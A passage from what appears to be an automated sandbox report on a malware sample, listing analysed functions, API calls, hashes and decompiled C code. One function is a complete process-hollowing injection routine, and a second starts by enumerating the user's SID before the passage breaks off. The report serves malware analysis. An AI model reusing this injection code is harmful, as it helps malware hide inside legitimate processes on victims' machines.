Instruction Fuzzy Hash: 3BE0B631240108EFCB216F55DC49AA97B79FF45785FD4443AF80696231CB39EDA2CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00408660 Relevance: 20.1, APIs: 13, Instructions: 611
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(00000000,00000000,?,0043A194,2F6E538A,?,00000000), ref: 004086C1
GetLastError.KERNEL32(?,00000000), ref: 004086C7

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 677416b2f065be909e1e34d9aa7e4e0e066a09f22e3cab73e9ee7cbfcd29be6c
Instruction ID: 1164324652f938c6e56d746a4d3e88ffcf299d9f4c3b2ffeb6d467404e5c52bb
Opcode Fuzzy Hash: 677416b2f065be909e1e34d9aa7e4e0e066a09f22e3cab73e9ee7cbfcd29be6c
Instruction Fuzzy Hash: FD224771A001089BEB18DB64CE89BDDBB71EF85304F60413EF445BB2D2DB399A80CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0095003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0095024D

Strings

cess, xrefs: 0095018D
kernel32.dll, xrefs: 0095008F, 00950095

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 3011bf755f7646c36f5d90342c8d2cb30f539888ed39e4fcd6c210434b9454ab
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 69527974A002299FDB64CF59C985BA8BBB1BF49305F1480D9E94DAB251DB30AE89DF10

Uniqueness

Uniqueness Score: -1.00%

Function 00421A85 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00421A8E
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00421AFC

Part of subcall function 004219A1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00425B70,?,00000000,00000000), ref: 00421A43

Part of subcall function 0041EB6A: RtlAllocateHeap.NTDLL(00000000,?,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041EB9C

_free.LIBCMT ref: 00421AED

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 1e2a4a0efd09f98f7f36030a6a4cef51275da8dbd300a357c5b071d00ade26cc
Instruction ID: 88290d06a301cf730bedd20d0fc3159d199ef7429d3ebe9dce97fa7c701557d6
Opcode Fuzzy Hash: 1e2a4a0efd09f98f7f36030a6a4cef51275da8dbd300a357c5b071d00ade26cc
Instruction Fuzzy Hash: 6601FCA2B022717B273155B72CC9C7B596DCDD2B64395013BFD00C2211FDA98C03C179

Uniqueness

Uniqueness Score: -1.00%

Function 00950E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00950223,?,?), ref: 00950E19
SetErrorMode.KERNELBASE(00000000,?,?,00950223,?,?), ref: 00950E1E

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 93ffa48b423e2448172ef2a8d6249573cbbb65ae7c140b352c25c32cb519ab2f
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 10D0123114512877D7002A95DC09BCD7B1CDF05B63F108411FB0DD9080C770994047E5

Uniqueness

Uniqueness Score: -1.00%

Function 00417040 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00417173

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 3b5b23c5fa6689e84e77140b6718f819b8b7c5b1361dddae77b329bb3301316b
Instruction ID: f34f057c1e5a000f7d12b7eeda6ad86c89b133dcd94049d6ad18afeba1d444d3
Opcode Fuzzy Hash: 3b5b23c5fa6689e84e77140b6718f819b8b7c5b1361dddae77b329bb3301316b
Instruction Fuzzy Hash: 3F3126717082009BC7289E7898805EEB7F9EB49320B20033FF925C7381DA799DC48799

Uniqueness

Uniqueness Score: -1.00%

Function 0041843E Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004021BE

Part of subcall function 004194C4: RaiseException.KERNEL32(E06D7363,00000001,00000003,0040219C,?,?,?,0040219C,?,00437E5C), ref: 00419524

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID:
API String ID: 3109751735-0
Opcode ID: 79d6810a6da1c1d9ca177275396e2fb46f041ff4ad844d49819a2d778b4ddbcc
Instruction ID: 1360fb4ad49e0a6147ae39c92cddbc32fcbc4ed3f3bf1f3567188be308e30735
Opcode Fuzzy Hash: 79d6810a6da1c1d9ca177275396e2fb46f041ff4ad844d49819a2d778b4ddbcc
Instruction Fuzzy Hash: C801667580020D77CB10BAA5EC469CA77AC9F00714B50863BFA14A7182FFB8EAC586DD

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB6A Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041EB9C

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecd79cb36f7ca9338d77787c855043579e064d7a7eef218fea13d0a1f95cdbd9
Instruction ID: c90605ddd2e615d822dec7d9fa3785c36c8ad6d34a685d0396ccfd50e39799fb
Opcode Fuzzy Hash: ecd79cb36f7ca9338d77787c855043579e064d7a7eef218fea13d0a1f95cdbd9
Instruction Fuzzy Hash: 1BE0E5395491205AEA30A633AC04BDB7A489F813A2F111137AD0A966C1CB5CECC281ED

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00403FB0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 162
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403FB0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				struct _STARTUPINFOA _v336;
				void _v340;
				struct _PROCESS_INFORMATION _v356;
				long _v360;
				void* _v364;
				CONTEXT* _v368;
				signed int _t46;
				void* _t63;
				void* _t64;
				_Unknown_base(*)()* _t85;
				CONTEXT* _t88;
				void* _t89;
				long _t98;
				intOrPtr* _t101;
				void* _t103;
				signed int _t104;

				_t46 =  *0x439008; // 0x2f6e538a
				_v8 = _t46 ^ _t104;
				_t103 = __ecx;
				GetModuleFileNameA(0,  &_v268, 0x104);
				if( *_t103 != 0x5a4d) {
					L12:
					VirtualFree(_t103, 0, 0x8000);
					return E00418232(_v8 ^ _t104);
				} else {
					_t101 =  *((intOrPtr*)(_t103 + 0x3c)) + _t103;
					if( *_t101 != 0x4550) {
						goto L12;
					} else {
						E00419710(_t101,  &_v336, 0, 0x44);
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x160], xmm0");
						if(CreateProcessA( &_v268, 0, 0, 0, 0, 4, 0, 0,  &_v336,  &_v356) == 0) {
							goto L12;
						} else {
							_t88 = VirtualAlloc(0, 4, 0x1000, 4);
							_v368 = _t88;
							_t88->ContextFlags = 0x10007;
							if(GetThreadContext(_v356.hThread, _t88) == 0) {
								goto L12;
							} else {
								ReadProcessMemory(_v356.hProcess, "   ",  &_v340, 4, 0);
								_t63 =  *(_t101 + 0x34);
								if(_v340 == _t63) {
									_t85 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
									 *_t85(_v356.hProcess, _v340);
									_t63 =  *(_t101 + 0x34);
								}
								_t64 = VirtualAllocEx(_v356.hProcess, _t63,  *(_t101 + 0x50), 0x3000, 0x40);
								_v364 = _t64;
								if(_t64 == 0) {
									goto L12;
								} else {
									WriteProcessMemory(_v356.hProcess, _t64, _t103,  *(_t101 + 0x54), 0);
									_v360 = 0;
									if(0 <  *(_t101 + 6)) {
										_t89 = 0;
										do {
											WriteProcessMemory(_v356.hProcess,  *((intOrPtr*)(_t89 + _t103 +  *((intOrPtr*)(_t103 + 0x3c)) + 0x104)) + _v364,  *((intOrPtr*)(_t89 + _t103 +  *((intOrPtr*)(_t103 + 0x3c)) + 0x10c)) + _t103,  *(_t89 + _t103 +  *((intOrPtr*)(_t103 + 0x3c)) + 0x108), 0);
											_t89 = _t89 + 0x28;
											_t98 = _v360 + 1;
											_v360 = _t98;
										} while (_t98 < ( *(_t101 + 6) & 0x0000ffff));
										_t88 = _v368;
									}
									WriteProcessMemory(_v356, _t88->Ebx + 8, _t101 + 0x34, 4, 0);
									_t88->Eax =  *((intOrPtr*)(_t101 + 0x28)) + _v364;
									SetThreadContext(_v356.hThread, _t88);
									ResumeThread(_v356.hThread);
									VirtualFree(_t103, 0, 0x8000);
									return E00418232(_v8 ^ _t104);
								}
							}
						}
					}
				}
			}

0x00403fb9
0x00403fc0
0x00403fd1
0x00403fd6
0x00403fe4
0x004041cd
0x004041d5
0x004041eb
0x00403fea
0x00403fed
0x00403ff5
0x00000000
0x00403ffb
0x00404006
0x00404014
0x00404017
0x00404043
0x00000000
0x00404049
0x0040405a
0x0040405d
0x00404063
0x00404077
0x00000000
0x0040407d
0x00404093
0x00404099
0x004040a2
0x004040b5
0x004040c7
0x004040c9
0x004040c9
0x004040dd
0x004040e3
0x004040eb
0x00000000
0x004040f1
0x004040fe
0x00404106
0x00404114
0x00404116
0x00404118
0x00404142
0x0040414e
0x00404155
0x00404156
0x0040415c
0x00404160
0x00404160
0x0040417e
0x0040418e
0x0040419a
0x004041a6
0x004041b4
0x004041cc
0x004041cc
0x004040eb
0x00404077
0x00404043
0x00403ff5

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403FD6
CreateProcessA.KERNEL32 ref: 0040403B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00404054
GetThreadContext.KERNEL32(?,00000000), ref: 0040406F
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00404093
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 004040AE
GetProcAddress.KERNEL32(00000000), ref: 004040B5
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004040DD
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004040FE
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 00404142
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 0040417E
SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 0040419A
ResumeThread.KERNEL32(?,?,?,00000000), ref: 004041A6
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 004041B4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004041D5

Strings

ntdll.dll, xrefs: 004040A9
, xrefs: 00404088
NtUnmapViewOfSection, xrefs: 004040A4

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
String ID: $NtUnmapViewOfSection$ntdll.dll
API String ID: 4033543172-1522589568
Opcode ID: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
Instruction ID: a9cd7b4eca6fd75c363069a252156244f2b8a6c1c24f95c61792526d0bff3807
Opcode Fuzzy Hash: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
Instruction Fuzzy Hash: 25517C71640218AFDB219F50DC49FEAB7B4FF48705F9000B6F608AA2D1D7B16995CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00954217 Relevance: 22.7, APIs: 15, Instructions: 162injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0095423D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 009542A2
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 009542BB
GetThreadContext.KERNEL32(?,00000000), ref: 009542D6
ReadProcessMemory.KERNEL32(?,00434ED4,?,00000004,00000000), ref: 009542FA
GetModuleHandleA.KERNEL32(00434EF0,00434ED8), ref: 00954315
GetProcAddress.KERNEL32(00000000), ref: 0095431C
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00954344
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00954365
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 009543A9
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 009543E5
SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00954401
ResumeThread.KERNEL32(?,?,?,00000000), ref: 0095440D
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 0095441B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0095443C

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
String ID:
API String ID: 4033543172-0
Opcode ID: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
Instruction ID: 91f0a13869f719c92c6957adb45b96ddcf2eccc13e5c7f15d2885afd2df9141f
Opcode Fuzzy Hash: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
Instruction Fuzzy Hash: E2518B71640218AFDB218F54DC45FEAB7B8FF08705F9040B5FA08EA1A1D7B1A999CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004037D0 Relevance: 27.2, APIs: 18, Instructions: 209
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E004037D0(void* __ebx, union _SID_NAME_USE __ecx, void* __edx, void* __edi, void* __esi) {
				long _v8;
				char _v16;
				signed int _v20;
				union _SID_NAME_USE _v24;
				long _v28;
				long _v32;
				signed int _v36;
				WCHAR* _v40;
				long _v44;
				void* _v48;
				signed int _v52;
				char* _v56;
				char _v60;
				long _v64;
				long _v68;
				intOrPtr _v72;
				void* _v80;
				void* _v84;
				char _v88;
				void* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _v104;
				long _v108;
				intOrPtr _v120;
				char _v124;
				long _v128;
				char _v136;
				signed int _v144;
				long _v176;
				intOrPtr _v180;
				char _v196;
				long _v200;
				long _v204;
				long _v208;
				char _v272;
				intOrPtr _v276;
				char _v288;
				struct _STARTUPINFOA _v356;
				void _v360;
				struct _PROCESS_INFORMATION _v376;
				long _v380;
				void* _v384;
				CONTEXT* _v388;
				char _v612;
				void* __ebp;
				signed int _t227;
				signed int _t228;
				WCHAR* _t235;
				int _t236;
				WCHAR* _t254;
				void** _t257;
				intOrPtr _t258;
				intOrPtr* _t259;
				intOrPtr _t260;
				long _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t279;
				void* _t282;
				void* _t283;
				signed int _t285;
				void* _t286;
				void* _t288;
				signed int _t293;
				signed int _t305;
				signed int _t307;
				void* _t310;
				void* _t311;
				_Unknown_base(*)()* _t332;
				intOrPtr _t334;
				void* _t339;
				intOrPtr _t346;
				intOrPtr _t350;
				void* _t354;
				signed int _t359;
				signed int _t360;
				void* _t361;
				char* _t367;
				intOrPtr _t368;
				intOrPtr _t372;
				intOrPtr _t376;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				void* _t392;
				intOrPtr* _t394;
				char* _t395;
				void* _t396;
				CONTEXT* _t398;
				void* _t400;
				void* _t410;
				intOrPtr* _t411;
				long _t417;
				char* _t418;
				void _t419;
				char* _t421;
				void* _t424;
				long _t432;
				intOrPtr _t433;
				intOrPtr _t440;
				char _t441;
				signed int _t458;
				void* _t459;
				void* _t460;
				char _t461;
				long _t462;
				void* _t463;
				long _t465;
				short* _t466;
				WCHAR* _t467;
				short* _t468;
				long _t469;
				intOrPtr _t470;
				void* _t471;
				void* _t472;
				long _t474;
				void* _t476;
				void* _t485;
				intOrPtr* _t489;
				long _t490;
				intOrPtr _t491;
				intOrPtr* _t495;
				WCHAR* _t500;
				intOrPtr* _t503;
				signed int _t505;
				long _t506;
				void* _t507;
				void* _t509;
				signed int _t514;
				signed int _t517;
				signed int _t518;
				signed int _t520;
				signed int _t524;
				void* _t525;
				void* _t527;
				signed int _t531;
				signed int _t532;
				void* _t533;
				signed int _t535;
				void* _t552;

				_t459 = __edx;
				_t514 = _t524;
				_push(0xffffffff);
				_push(0x429818);
				_push( *[fs:0x0]);
				_t525 = _t524 - 0x44;
				_t227 =  *0x439008; // 0x2f6e538a
				_t228 = _t227 ^ _t514;
				_v20 = _t228;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t228);
				 *[fs:0x0] =  &_v16;
				_v56 = __ecx;
				_v24 = __ecx;
				_v24 = __ecx;
				_t392 = 0;
				_v48 = 0;
				_v36 = 0;
				_v28 = 0;
				GetUserNameW(0,  &_v28);
				_t235 = HeapAlloc(GetProcessHeap(), 8, 2 + _v28 * 2);
				_v40 = _t235;
				_t236 = GetUserNameW(_t235,  &_v28);
				_t500 = _v40;
				if(_t236 == 0) {
					L19:
					HeapFree(GetProcessHeap(), 0, _t500);
					HeapFree(GetProcessHeap(), 0, _t392);
					HeapFree(GetProcessHeap(), 0, _v48);
					LocalFree(_v36);
					goto L20;
				} else {
					_v28 = 0;
					_v32 = 0;
					LookupAccountNameW(0, _t500, 0,  &_v28, 0,  &_v32,  &_v24);
					_t392 = HeapAlloc(GetProcessHeap(), 8, _v28);
					_t254 = HeapAlloc(GetProcessHeap(), 8, _v32 + _v32);
					_v48 = _t254;
					if(_t392 == 0 || _t254 == 0 || LookupAccountNameW(0, _t500, _t392,  &_v28, _t254,  &_v32,  &_v24) == 0) {
						goto L19;
					} else {
						_t257 =  &_v36;
						__imp__ConvertSidToStringSidW(_t392, _t257);
						if(_t257 == 0) {
							goto L19;
						} else {
							_t489 = _v36;
							_t503 = _t489;
							_t29 = _t503 + 2; // 0x2
							_t410 = _t29;
							do {
								_t258 =  *_t503;
								_t503 = _t503 + 2;
								_t550 = _t258;
							} while (_t258 != 0);
							_t505 = _t503 - _t410 >> 1;
							_t259 = E004186CD(_t459, _t550, _t505);
							_t527 = _t525 + 4;
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x30], xmm0");
							_t394 = _t259;
							if(_t505 != 0) {
								_t485 = _v48;
								_t458 = _v52;
								do {
									 *((char*)(_t458 + _t394)) =  *((intOrPtr*)(_t489 + _t458 * 2));
									_t458 = _t458 + 1;
									asm("adc edx, 0x0");
									_t552 = _t485;
								} while (_t552 < 0 || _t552 <= 0 && _t458 < _t505);
							}
							_t411 = _t394;
							_v64 = 0;
							_v60 = 0xf;
							_v80 = 0;
							_t38 = _t411 + 1; // 0x1
							_t460 = _t38;
							do {
								_t260 =  *_t411;
								_t411 = _t411 + 1;
							} while (_t260 != 0);
							_push(_t411 - _t460);
							E00417040( &_v80, _t460, _t394);
							_t395 = _v56;
							_v8 = 0;
							_t415 =  <  ? _v64 : 0x28;
							_push( <  ? _v64 : 0x28);
							_t263 =  >=  ? _v80 :  &_v80;
							 *(_t395 + 0x10) = 0;
							 *((intOrPtr*)(_t395 + 0x14)) = 0xf;
							 *_t395 = 0;
							E00417040(_t395, _t460,  >=  ? _v80 :  &_v80);
							_t461 = _v60;
							if(_t461 < 0x10) {
								L18:
								L20:
								 *[fs:0x0] = _v16;
								return E00418232(_v20 ^ _t514);
							} else {
								_t417 = _v80;
								_t462 = _t461 + 1;
								_t266 = _t417;
								if(_t462 < 0x1000) {
									L17:
									_push(_t462);
									E004186BF(_t417);
									goto L18;
								} else {
									_t417 =  *((intOrPtr*)(_t417 - 4));
									_t462 = _t462 + 0x23;
									if(_t266 - _t417 + 0xfffffffc > 0x1f) {
										E0041CD1C(_t395, _t417, _t462, _t489, __eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t395);
										_t396 = _t527;
										_t531 = (_t527 - 0x00000008 & 0xfffffff8) + 4;
										_push(_t514);
										_v120 =  *((intOrPtr*)(_t396 + 4));
										_t517 = _t531;
										_push(0xffffffff);
										_push(0x429863);
										_push( *[fs:0x0]);
										_push(_t396);
										_t532 = _t531 - 0x68;
										_t272 =  *0x439008; // 0x2f6e538a
										_t273 = _t272 ^ _t517;
										_v144 = _t273;
										_push(_t505);
										_push(_t489);
										_push(_t273);
										 *[fs:0x0] =  &_v136;
										_t490 = _t462;
										_v208 = _t490;
										_t506 = _t417;
										_v204 = _t506;
										_v200 = _t506;
										_v200 = _t506;
										_v128 = 0;
										_t418 = 0;
										_v180 = 0;
										_v176 = 0xf;
										_v196 = 0;
										_v128 = 1;
										_t463 = 0;
										_t275 =  *(_t396 + 0x18);
										_v200 = 0;
										__eflags = _t275;
										if(_t275 == 0) {
											L50:
											 *(_t506 + 0x10) = 0;
											 *((intOrPtr*)(_t506 + 0x14)) = 0xf;
											 *_t506 = 0;
											__eflags = _t418 - 5;
											if(__eflags < 0) {
												goto L60;
											} else {
												_t132 = _t418 - 5; // -5
												_t339 = _t132;
												__eflags = _t339 - _t490;
												_t490 =  <  ? _t339 : _t490;
												__eflags = _v68 - 0x10;
												_t341 =  >=  ? _v88 :  &_v88;
												_push(_t490);
												_t342 = ( >=  ? _v88 :  &_v88) + 5;
												E00417040(_t506, _t463, ( >=  ? _v88 :  &_v88) + 5);
												_t469 = _v68;
												__eflags = _t469 - 0x10;
												if(_t469 < 0x10) {
													L55:
													_t470 =  *((intOrPtr*)(_t396 + 0x1c));
													__eflags = _t470 - 0x10;
													if(_t470 < 0x10) {
														L59:
														 *[fs:0x0] = _v28;
														__eflags = _v36 ^ _t517;
														return E00418232(_v36 ^ _t517);
													} else {
														_t440 =  *((intOrPtr*)(_t396 + 8));
														_t471 = _t470 + 1;
														_t346 = _t440;
														__eflags = _t471 - 0x1000;
														if(_t471 < 0x1000) {
															L58:
															_push(_t471);
															E004186BF(_t440);
															goto L59;
														} else {
															_t418 =  *((intOrPtr*)(_t440 - 4));
															_t463 = _t471 + 0x23;
															__eflags = _t346 - _t418 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L61;
															} else {
																goto L58;
															}
														}
													}
												} else {
													_t441 = _v88;
													_t472 = _t469 + 1;
													_t350 = _t441;
													__eflags = _t472 - 0x1000;
													if(_t472 < 0x1000) {
														L54:
														_push(_t472);
														E004186BF(_t441);
														_t532 = _t532 + 8;
														goto L55;
													} else {
														_t418 =  *((intOrPtr*)(_t441 - 4));
														_t463 = _t472 + 0x23;
														__eflags = _t350 - _t418 + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L61;
														} else {
															goto L54;
														}
													}
												}
											}
										} else {
											while(1) {
												_v48 = 0;
												_v44 = 0xf;
												_v64 = 0;
												__eflags = _t275 - _t463;
												if(__eflags < 0) {
													break;
												}
												_t354 = _t275 - _t463;
												__eflags = _t354 - 1;
												_t443 =  <  ? _t354 : 1;
												__eflags =  *((intOrPtr*)(_t396 + 0x1c)) - 0x10;
												_t356 =  >=  ?  *((void*)(_t396 + 8)) : _t396 + 8;
												_push( <  ? _t354 : 1);
												_t357 = ( >=  ?  *((void*)(_t396 + 8)) : _t396 + 8) + _t463;
												E00417040( &_v64, _t463, ( >=  ?  *((void*)(_t396 + 8)) : _t396 + 8) + _t463);
												_v20 = 2;
												_t490 = _v44;
												__eflags = _t490 - 0x10;
												_t506 = _v64;
												_t418 =  >=  ? _t506 :  &_v64;
												_t359 = E00417E80(_t418, _v48, "0", 1);
												_t532 = _t532 + 8;
												__eflags = _t359;
												if(_t359 != 0) {
													L35:
													_t360 =  *(_t396 + 0x18);
													_t463 = _v92;
													_v108 = 0;
													_v104 = 0xf;
													_v124 = 0;
													__eflags = _t360 - _t463;
													if(__eflags < 0) {
														break;
													} else {
														_t361 = _t360 - _t463;
														__eflags = _t361 - 1;
														_t447 =  <  ? _t361 : 1;
														__eflags =  *((intOrPtr*)(_t396 + 0x1c)) - 0x10;
														_t363 =  >=  ?  *((void*)(_t396 + 8)) : _t396 + 8;
														_push( <  ? _t361 : 1);
														_t364 = ( >=  ?  *((void*)(_t396 + 8)) : _t396 + 8) + _t463;
														E00417040( &_v124, _t463, ( >=  ?  *((void*)(_t396 + 8)) : _t396 + 8) + _t463);
														_v20 = 3;
														_t418 =  &_v124;
														_t367 = E00417DC0(_t418,  &_v124,  &_v88);
														_t474 = _v68;
														asm("movq xmm1, [eax+0x10]");
														asm("movq [ebp-0x78], xmm1");
														asm("movups xmm0, [eax]");
														 *(_t367 + 0x10) = 0;
														 *((intOrPtr*)(_t367 + 0x14)) = 0xf;
														 *_t367 = 0;
														asm("movups [ebp-0x28], xmm0");
														__eflags = _t474 - 0x10;
														if(_t474 < 0x10) {
															L40:
															_v20 = 2;
															_t463 = _v104;
															asm("movq [ebp-0x38], xmm1");
															asm("movups [ebp-0x48], xmm0");
															__eflags = _t463 - 0x10;
															if(_t463 < 0x10) {
																goto L44;
															} else {
																_t418 = _v124;
																_t463 = _t463 + 1;
																_t372 = _t418;
																__eflags = _t463 - 0x1000;
																if(_t463 < 0x1000) {
																	L43:
																	_push(_t463);
																	E004186BF(_t418);
																	_t532 = _t532 + 8;
																	goto L44;
																} else {
																	_t418 =  *((intOrPtr*)(_t418 - 4));
																	_t463 = _t463 + 0x23;
																	__eflags = _t372 - _t418 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L61;
																	} else {
																		goto L43;
																	}
																}
															}
														} else {
															_t418 = _v88;
															_t476 = _t474 + 1;
															_t376 = _t418;
															__eflags = _t476 - 0x1000;
															if(_t476 < 0x1000) {
																L39:
																_push(_t476);
																E004186BF(_t418);
																asm("movups xmm0, [ebp-0x28]");
																_t532 = _t532 + 8;
																asm("movq xmm1, [ebp-0x78]");
																goto L40;
															} else {
																_t418 =  *((intOrPtr*)(_t418 - 4));
																_t463 = _t476 + 0x23;
																__eflags = _t376 - _t418 + 0xfffffffc - 0x1f;
